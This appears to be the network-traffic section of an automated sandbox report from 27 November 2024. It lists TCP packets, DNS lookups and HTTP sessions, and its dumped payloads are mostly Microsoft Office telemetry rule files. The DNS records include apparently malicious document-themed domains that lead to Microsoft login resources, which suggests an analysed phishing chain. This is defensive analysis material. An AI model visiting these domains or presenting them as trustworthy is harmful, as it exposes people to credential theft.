                                                  Nov 27, 2024 18:10:44.969189882 CET49916443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:44.969270945 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:44.969770908 CET49916443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:44.969784975 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.088967085 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.089410067 CET49917443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.089432955 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.089945078 CET49917443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.089950085 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.221900940 CET49915443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.221916914 CET4434991513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.414449930 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.414597034 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.414648056 CET49916443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.414905071 CET49916443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.414921045 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.414931059 CET49916443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.414937019 CET4434991613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.418471098 CET49920443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.418488026 CET4434992013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.418545008 CET49920443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.418687105 CET49920443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.418700933 CET4434992013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.551093102 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.558024883 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.558085918 CET49917443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.558159113 CET49917443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.558166981 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.558196068 CET49917443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.558202028 CET4434991713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.561362982 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.561861038 CET49921443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.561897993 CET4434992113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.561969995 CET49921443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.562155008 CET49921443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.562167883 CET4434992113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.562534094 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.562549114 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:45.563018084 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:45.563023090 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.027688980 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.027745008 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.027838945 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.027873039 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.027980089 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.028038025 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.028213024 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.028240919 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.028276920 CET49918443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.028309107 CET4434991813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.040363073 CET49922443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.040410995 CET4434992213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.041169882 CET49922443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.049192905 CET49922443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.049206018 CET4434992213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.853368044 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.854108095 CET49919443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.854134083 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:46.854628086 CET49919443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:46.854634047 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.299508095 CET4434992013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.300816059 CET49920443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.300833941 CET4434992013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.301497936 CET49920443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.301502943 CET4434992013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.309557915 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.312793970 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.312838078 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.312896967 CET49919443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.312942028 CET49919443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.312958002 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.312969923 CET49919443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.312974930 CET4434991913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.316066027 CET49923443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.316138983 CET4434992313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.316266060 CET49923443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.316386938 CET49923443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.316420078 CET4434992313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.362165928 CET4434992113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.362713099 CET49921443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.362734079 CET4434992113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:47.363190889 CET49921443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:47.363198042 CET4434992113.107.246.63192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 27, 2024 18:09:25.234342098 CET53537041.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:25.268878937 CET53597241.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:28.145037889 CET53510911.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:29.065993071 CET5506253192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:29.066128969 CET5738053192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:29.208479881 CET53573801.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:29.208616018 CET53550621.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:30.871366978 CET6380253192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:30.871577978 CET5214253192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:31.684962988 CET53638021.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:31.686808109 CET53521421.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:35.042280912 CET53501821.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:45.114070892 CET53609421.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:45.276355028 CET5105253192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:45.276523113 CET5751853192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:46.288464069 CET5930353192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:46.295718908 CET5270953192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:46.347453117 CET53575181.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:46.347620010 CET53510521.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:46.427995920 CET53593031.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:46.434190035 CET53527091.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:48.420888901 CET5825353192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:48.421046019 CET6102653192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:49.192888021 CET53610261.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:49.195633888 CET53582531.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:56.591643095 CET5985653192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:56.591896057 CET5281453192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:56.730372906 CET53598561.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:56.735402107 CET53528141.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:59.326752901 CET5141853192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:59.326895952 CET5358753192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:09:59.486812115 CET53514181.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:09:59.487133026 CET53535871.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:10:04.407252073 CET53501151.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:10:06.584546089 CET5929053192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:10:06.584686995 CET5458053192.168.2.61.1.1.1
                                                  Nov 27, 2024 18:10:06.920665026 CET53646871.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:10:07.182430029 CET53545801.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:10:24.724952936 CET53521301.1.1.1192.168.2.6
                                                  Nov 27, 2024 18:10:27.081255913 CET53580151.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPChecksumCodeType
                                                  Nov 27, 2024 18:09:25.361183882 CET192.168.2.61.1.1.1c235(Port unreachable)Destination Unreachable
                                                  Nov 27, 2024 18:09:46.428118944 CET192.168.2.61.1.1.1c206(Port unreachable)Destination Unreachable
                                                  Nov 27, 2024 18:09:54.148562908 CET192.168.2.61.1.1.1c2a2(Port unreachable)Destination Unreachable
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 27, 2024 18:09:29.065993071 CET192.168.2.61.1.1.10xa6d5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:29.066128969 CET192.168.2.61.1.1.10x1080Standard query (0)www.google.com65IN (0x0001)false
                                                  Nov 27, 2024 18:09:30.871366978 CET192.168.2.61.1.1.10x7ceeStandard query (0)adrianocarreira.comA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:30.871577978 CET192.168.2.61.1.1.10xc6faStandard query (0)adrianocarreira.com65IN (0x0001)false
                                                  Nov 27, 2024 18:09:45.276355028 CET192.168.2.61.1.1.10xc858Standard query (0)documerge.arroiodosilva.com.brA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:45.276523113 CET192.168.2.61.1.1.10xcccStandard query (0)documerge.arroiodosilva.com.br65IN (0x0001)false
                                                  Nov 27, 2024 18:09:46.288464069 CET192.168.2.61.1.1.10x41b5Standard query (0)documerge.arroiodosilva.com.brA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:46.295718908 CET192.168.2.61.1.1.10x96d1Standard query (0)documerge.arroiodosilva.com.br65IN (0x0001)false
                                                  Nov 27, 2024 18:09:48.420888901 CET192.168.2.61.1.1.10x5ff8Standard query (0)documerger.afua.com.brA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:48.421046019 CET192.168.2.61.1.1.10x7deaStandard query (0)documerger.afua.com.br65IN (0x0001)false
                                                  Nov 27, 2024 18:09:56.591643095 CET192.168.2.61.1.1.10xfae6Standard query (0)documerger.afua.com.brA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:56.591896057 CET192.168.2.61.1.1.10xf359Standard query (0)documerger.afua.com.br65IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.326752901 CET192.168.2.61.1.1.10xaf7fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.326895952 CET192.168.2.61.1.1.10x16b0Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                  Nov 27, 2024 18:10:06.584546089 CET192.168.2.61.1.1.10x348bStandard query (0)portal.microsoftonline.comA (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:10:06.584686995 CET192.168.2.61.1.1.10x3769Standard query (0)portal.microsoftonline.com65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 27, 2024 18:09:29.208479881 CET1.1.1.1192.168.2.60x1080No error (0)www.google.com65IN (0x0001)false
                                                  Nov 27, 2024 18:09:29.208616018 CET1.1.1.1192.168.2.60xa6d5No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:31.684962988 CET1.1.1.1192.168.2.60x7ceeNo error (0)adrianocarreira.com94.46.167.218A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:46.347620010 CET1.1.1.1192.168.2.60xc858No error (0)documerge.arroiodosilva.com.br94.247.42.112A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:46.427995920 CET1.1.1.1192.168.2.60x41b5No error (0)documerge.arroiodosilva.com.br94.247.42.112A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:49.195633888 CET1.1.1.1192.168.2.60x5ff8No error (0)documerger.afua.com.br94.247.42.112A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:53.944072008 CET1.1.1.1192.168.2.60x9a54No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:53.944072008 CET1.1.1.1192.168.2.60x9a54No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:53.944072008 CET1.1.1.1192.168.2.60x9a54No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:54.148490906 CET1.1.1.1192.168.2.60x46e6No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:56.730372906 CET1.1.1.1192.168.2.60xfae6No error (0)documerger.afua.com.br94.247.42.112A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.469815969 CET1.1.1.1192.168.2.60xadf0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.469815969 CET1.1.1.1192.168.2.60xadf0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.486812115 CET1.1.1.1192.168.2.60xaf7fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.486812115 CET1.1.1.1192.168.2.60xaf7fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.486812115 CET1.1.1.1192.168.2.60xaf7fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.487133026 CET1.1.1.1192.168.2.60x16b0No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:09:59.487133026 CET1.1.1.1192.168.2.60x16b0No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:10:07.182430029 CET1.1.1.1192.168.2.60x3769No error (0)portal.microsoftonline.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:10:07.182430029 CET1.1.1.1192.168.2.60x3769No error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:10:07.253922939 CET1.1.1.1192.168.2.60x348bNo error (0)portal.microsoftonline.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 27, 2024 18:10:07.253922939 CET1.1.1.1192.168.2.60x348bNo error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  • otelrules.azureedge.net
                                                  • adrianocarreira.com
                                                  • fs.microsoft.com
                                                  • https:
                                                    • documerge.arroiodosilva.com.br
                                                    • documerger.afua.com.br
                                                    • csp.microsoft.com
                                                  • slscr.update.microsoft.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.649707184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-11-27 17:09:32 UTC478INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Server: Kestrel
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-weu-z1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  X-OSID: 2
                                                  X-CID: 2
                                                  X-CCC: GB
                                                  Cache-Control: public, max-age=53661
                                                  Date: Wed, 27 Nov 2024 17:09:31 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.64970813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:32 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:32 UTC471INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:32 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 218853
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public
                                                  Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT
                                                  ETag: "0x8DD0D538D5EA1E0"
                                                  x-ms-request-id: f5f75198-101e-00a2-8091-3f9f2e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170932Z-174f7845968ljs8phC1EWRe6en0000000x30000000009snx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:32 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                  Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                  Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                  Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                  Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                  Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
